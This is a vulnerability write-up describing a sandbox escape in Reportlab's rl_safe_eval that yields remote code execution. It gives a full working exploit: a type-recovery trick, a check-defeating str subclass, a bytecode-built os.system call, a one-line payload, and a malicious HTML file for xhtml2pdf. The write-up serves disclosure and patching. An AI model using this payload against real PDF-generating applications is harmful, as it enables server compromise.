tl;dr This write-up details how an RCE in Reportlab - was found and exploited. Due to the prevalence of Reportlab in HTML to PDF processing, this vulnerability may be reachable in many applications that process PDF files, making this an important one to patch and look out for.
A few days ago, during a web application audit we noticed that the application was using the Reportlab python library to perform the dynamic generation of PDF files from HTML input. The Reportlab was found to have a previously patched vulnerability leading to Code execution. which means that finding a bypass to the patch was pretty interesting from the attacker point of view as it would lead to the rediscovery of the code execution, especially the Reportlab library is also used in other applications and tools.
First thing first, a quick recap: Reportlab is an Open Source project that allows the creation of documents in Adobe's Portable Document Format (PDF) using the Python programming language. It also creates charts and data graphics in various bitmap and vector formats as well as PDF.
The library has known in 2019 a similar exploit leading to remote code execution via the Color attribute of the HTML tags, the content of the attribute was directly evaluated as a python expression using eval
function thus leading to code execution. To mitigate the issue Reportlab has implemented a sandbox calling it rl_safe_eval
that is stripped from all python builtins functions and has multiple overridden builtin functions to permit the execution of the library safe code while stopping any access to dangerous functions and libraries that can subsequently lead to construction of dangerous python code:
An example of this prevention measures is that the builtin getattr
function is overridden with a restricted function __rl_getitem__
that prohibits access to any dangerous attributes of objects like the ones that start with __
:
class __RL_SAFE_ENV__(object):
__time_time__ = time.time
__weakref_ref__ = weakref.ref
__slicetype__ = type(slice(0))
def __init__(self, timeout=None, allowed_magic_methods=None):
self.timeout = timeout if timeout is not None else self.__rl_tmax__
self.allowed_magic_methods = (__allowed_magic_methods__ if allowed_magic_methods==True
else allowed_magic_methods) if allowed_magic_methods else []
#[...]
# IN THIS LINE IT CAN BE OBSERVED THAT THE BUILTIN GETATR IS REPLACED WITH A CUSTOM FUNCTION
# THAT CHECKS THE SAFETY OF THE PASSED ATTRIBUTE NAME BEFORE GETTING IT
__rl_builtins__['getattr'] = self.__rl_getattr__
__rl_builtins__['dict'] = __rl_dict__
#[...]
def __rl_getattr__(self, obj, a, *args):
if isinstance(obj, strTypes) and a=='format':
raise BadCode('%s.format is not implemented' % type(obj))
# MULTIPLE CHECKS ARE DONE BEFORE FETCHING THE ATTRIBUTE AND RETURNING IT
# TO THE CALLER IN THE SANDBOXED EVAL ENVIRONMENT
self.__rl_is_allowed_name__(a)
return getattr(obj,a,*args)
def __rl_is_allowed_name__(self, name):
"""Check names if they are allowed.
If ``allow_magic_methods is True`` names in `__allowed_magic_methods__`
are additionally allowed although their names start with `_`.
"""
if isinstance(name,strTypes):
# NO ACCESS TO ATTRIBUTES STARTING WITH __ OR MATCH A PREDEFINED UNSAFE ATTRIBUTES NAMES
if name in __rl_unsafe__ or (name.startswith('__')
and name!='__'
and name not in self.allowed_magic_methods):
raise BadCode('unsafe access of %s' % name)
The safe eval as described earlier sanitizes the environment from all dangerous functions so that executing code has no access to dangerous tools that can be used to execute malicious actions, however in case a bypass is found to those restrictions and an access to one of the original builtins functions is achieved, it would facilitate greatly the exploitation of the sandboxed environment.
One of the many overridden builtin classes is called type
, if this class is called with one argument, it returns the type of an object. however in case it is called with three arguments, it returns a new type object. This is essentially a dynamic form of the class statement. In other words it can allow the creation of a new class that inherits from another class.
So the idea here is to create a new class called Word
that inherits from str
that when passed to the custom getattr
it would bypass the checks and would allow the access to sensitive attributes like __code__
.
Before the custom getattr
in sandboxed eval returns the attribute it does some checks by calling __rl_is_allowed_name__
to check the for safety of the called attribute before calling the python builtin getattr
and returning the result.
def __rl_is_allowed_name__(self, name):
"""Check names if they are allowed.
If ``allow_magic_methods is True`` names in `__allowed_magic_methods__`
are additionally allowed although their names start with `_`.
"""
if isinstance(name,strTypes):
if name in __rl_unsafe__ or (name.startswith('__')
and name!='__'
and name not in self.allowed_magic_methods):
raise BadCode('unsafe access of %s' % name)
To bypass the __rl_is_allowed_name__
function, the Word
class should:
- Always return
False
for calls to functionstartswith
to bypass(name.startswith('__')
- Should return
False
to its first call to__eq__
to bypass thename in __rl_unsafe__
, after the first call it should return the correct response because when__eq__
is called by the python builtingetattr
it should return the correct result. - the hash should be he same of he hash of its underlying string
The following class fulfills these criteria:
Word = type('Word', (str,), {
'mutated' : 1,
'startswith': lambda self, x: False,
'__eq__' : lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
'mutate' : lambda self: {setattr(self, 'mutated', self.mutated - 1)},
'__hash__' : lambda self: hash(str(self))
})
code = Word('__code__')
print(code == '__code__') ## prints False
print(code == '__code__') ## prints True
print(code == '__code__') ## prints True
print(code == '__code__') ## prints True
print(code.startswith('__')) ## prints False
The custom type function in the safe eval does not allow to be passed three arguments:
def __rl_type__(self,*args):
if len(args)==1: return type(*args)
raise BadCode('type call error')
A bypass for this was found by calling type on itself, allowing the retrieval of the original builtin type
function:
orgTypeFun = type(type(1))
combining these two lines of code would give something like this:
orgTypeFun = type(type(1))
Word = orgTypeFun('Word', (str,), {
'mutated' : 1,
'startswith': lambda self, x: False,
'__eq__' : lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
'mutate' : lambda self: {setattr(self, 'mutated', self.mutated - 1)},
'__hash__' : lambda self: hash(str(self))
})
Now what is left is to write the exploit:
To do this a function will be reconstructed from the bytecode of a compiled one:
orgTypeFun = type(type(1))
Word = orgTypeFun('Word', (str,), {
'mutated': 1,
'startswith': lambda self, x: False,
'__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
'__hash__': lambda self: hash(str(self))
})
codeattr = Word('__code__')
ftype = orgTypeFun(lambda: {None})
ctype = orgTypeFun(getattr(lambda: {None},codeattr))
# The byte code is of a function that looks like this
# def exp():
# __import__('os').system('touch /tmp/exploited')
f = ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00',
(None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})
f()
However a multiline expression like this will not be executed in an eval context, to bypass this issue, list comprehension
trick can be used, something like this:
[print(x) for x in ['hellworld']]
# which would be equivalent to
x='helloworld'
print(x)
[[ print (x + ' ' + y) for y in ['second var']] for x in ['first var']]
# which would be equivalent to
x='first var'
x='second var'
print (x + ' ' + y)
With this technique the exploit code can be rewritten in one line of code like this (this is considered one line x) the multiline here is just formatting to increase readability of the exploit, The declarations should be read from bottom to top x) weird but this is how it works):
[
[
[
[
ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00',
(None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})()
for ftype in [type(lambda: None)]
]
for ctype in [type(getattr(lambda: {None}, Word('__code__')))]
]
for Word in [orgTypeFun('Word', (str,), {
'mutated': 1,
'startswith': lambda self, x: False,
'__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x,
'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
'__hash__': lambda self: hash(str(self))
})]
]
for orgTypeFun in [type(type(1))]
]
Please refer to the poc.py
as it contains proof of concept that demonstrates the code execution (upon successful exploitation a file called exploited
is created in /tmp/ ).
A lot of apps and libraries use the Reportlab library for example xhtml2pdf utility function is vulnerable and can suffer from code execution while transforming malicious HTML to pdf
cat >mallicious.html <<EOF
<para><font color="[ [ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (none, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: none)] ] for ctype in [type(getattr(lambda: {none}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1==0, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]]">
exploit
</font></para>
EOF
xhtml2pdf mallicious.html
ls -al /tmp/exploited
``